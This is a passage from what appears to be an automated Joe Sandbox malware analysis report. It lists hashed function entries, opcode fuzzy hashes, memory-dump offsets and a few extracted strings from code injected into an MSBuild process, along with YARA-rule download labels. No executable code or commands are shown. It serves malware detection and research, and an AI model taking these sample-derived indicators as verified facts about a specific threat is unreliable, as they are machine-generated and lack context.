                                                          • Instruction Fuzzy Hash: 8511CA30A053448FEFAA5B79D454FA93B64E741B1CF10497AF856DF242D923CC458BC2
                                                          Function 01350848 Relevance: .1, Instructions: 62COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b66c25ea94d9bd01e1933158d5148be3947ddaf667e4957e0c5129b6e0cca4bc
                                                          • Instruction ID: ee758e7a0b400f09af147cbd02686691b2af4bba3bd888b8b1de59511fd54a0a
                                                          • Opcode Fuzzy Hash: b66c25ea94d9bd01e1933158d5148be3947ddaf667e4957e0c5129b6e0cca4bc
                                                          • Instruction Fuzzy Hash: 33119430B012088BEFA9AB7DD454F293B95FB45B18F104979F856CF346DA22CC858BC1
                                                          Function 01356B4F Relevance: .1, Instructions: 60COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 998a371145c8cc60cb14e81337bb9da944a484b4a748caeae27b41d4e64186c8
                                                          • Instruction ID: b40c841bd4b4a34283a8b6f7ac36ff5a506b325cb99f4a80e237513fb79b0fed
                                                          • Opcode Fuzzy Hash: 998a371145c8cc60cb14e81337bb9da944a484b4a748caeae27b41d4e64186c8
                                                          • Instruction Fuzzy Hash: 9C11B2316093848FD316AB79D42479A7FB6AF8B605F1544EEC085DF2A3DA354C05CBA2
                                                          Function 01351452 Relevance: .1, Instructions: 57COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1dfbf11ebfbd3e62aa7f6f5dd046be8ff9b043e3fcf47ccc0ac36b0d86714267
                                                          • Instruction ID: a8def02aa47bf4f645cf453b6d188c54fcad8a956791f30111cde48c5628dbd3
                                                          • Opcode Fuzzy Hash: 1dfbf11ebfbd3e62aa7f6f5dd046be8ff9b043e3fcf47ccc0ac36b0d86714267
                                                          • Instruction Fuzzy Hash: AD11A571E012169BCFA5EFBC8440AAE7BF4EF48629B140479EC05F7301E632D942CB91
                                                          Function 010FD017 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591757382.00000000010FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 010FD000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_10fd000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                          • Instruction ID: 40fe104e48457e996c899aaa451e8bd4e46c8824c697f02dcab4b87a82880fd7
                                                          • Opcode Fuzzy Hash: 0571d9b095afed8b546122286ae05565a289416437c47d1601190cbee81fcf2c
                                                          • Instruction Fuzzy Hash: 2311DD75504280CFCB16CF54D5C4B15FFA2FB84314F28C6AEE9494BA96C33AD44ACBA2
                                                          Function 01351460 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2b5371290746ab8ce7a7cb433f2ddbebc44dc3c054b6808e625bece66cda5621
                                                          • Instruction ID: 10bf52f19ca6fbf3a93b79f403b63752ab5ed47e3e8193e9a52773ce03816083
                                                          • Opcode Fuzzy Hash: 2b5371290746ab8ce7a7cb433f2ddbebc44dc3c054b6808e625bece66cda5621
                                                          • Instruction Fuzzy Hash: BD018071A012168BCFA5EFBC8450AAE7BF8EB48628B14047ADC05F7301E736D842CB91
                                                          Function 01359910 Relevance: .1, Instructions: 52COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3b46e0ed72957b0b42998187f208d60c4b1d1bf803915cfcb55035a69d6d580f
                                                          • Instruction ID: 17baf06b1e97849efbe5b001cba1076f97e96972c8d465aa654d0fe74f5d7142
                                                          • Opcode Fuzzy Hash: 3b46e0ed72957b0b42998187f208d60c4b1d1bf803915cfcb55035a69d6d580f
                                                          • Instruction Fuzzy Hash: C3112671A00201CFEB01DFA5D948789BBB6FF95300F1586A5C8486F2DAEB74DD06C7A1
                                                          Function 01358171 Relevance: .0, Instructions: 34COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 00ffcc0087ac565877369c2c1037173daf7012d4e07644e339c733432ffba76b
                                                          • Instruction ID: ae5bddbf3d7e4bcaa66005f1796d4575a2553018a264d5e7cc05a1e3efe0b142
                                                          • Opcode Fuzzy Hash: 00ffcc0087ac565877369c2c1037173daf7012d4e07644e339c733432ffba76b
                                                          • Instruction Fuzzy Hash: 1D016D706142899FDB06FBA4E990A9D7F71EF41304B9446ACC0109F297EF316E16EB91
                                                          Function 01358180 Relevance: .0, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: de5b3354b80ba84b6f75c0b9dae232bb48504c79fce8910c177d648c134ffb7f
                                                          • Instruction ID: 2162e01d60b4182f799c20a36fe3ef03a3e779884cbed942e5e53418ef9813d0
                                                          • Opcode Fuzzy Hash: de5b3354b80ba84b6f75c0b9dae232bb48504c79fce8910c177d648c134ffb7f
                                                          • Instruction Fuzzy Hash: F3F0EC70A112499FDB06FBA8E99069DBBB5AB44300F904668C0049F255EF706E159B91

                                                          Non-executed Functions

                                                          Function 013547D8 Relevance: 5.2, Strings: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$\Vam$dyqJ$dyqJ
                                                          • API String ID: 0-3757870759
                                                          • Opcode ID: c8aadf4d55d44d441963e16ab292a7c3283966f786a47de4ec2829498e37bb09
                                                          • Instruction ID: 03ce0bd9e2489bee3e03248df3dcd01f9917f0458ebaf1c8163a93897387f9a6
                                                          • Opcode Fuzzy Hash: c8aadf4d55d44d441963e16ab292a7c3283966f786a47de4ec2829498e37bb09
                                                          • Instruction Fuzzy Hash: E8716F70E00349DFDF58CFA9C885BDEBBF2AF88714F148129E805A7254EB759885CB91
                                                          Function 013547CE Relevance: 5.2, Strings: 4, Instructions: 179COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000003.00000002.2591920837.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_3_2_1350000_MSBuild.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: \Vam$\Vam$dyqJ$dyqJ
                                                          • API String ID: 0-3757870759
                                                          • Opcode ID: 2d7d4f148babf28a43408f2b06ea3a596578ac53bed4403a96f56839596a04d4
                                                          • Instruction ID: d15b4dbb1c0aa21f0037b6643ca44fd6265c9353a04803217335583a2b9437bd
                                                          • Opcode Fuzzy Hash: 2d7d4f148babf28a43408f2b06ea3a596578ac53bed4403a96f56839596a04d4
                                                          • Instruction Fuzzy Hash: 72715D70D00349DFDF54CFA9C885BDEBBF1AF88B18F148129E804A7254EB759885CB91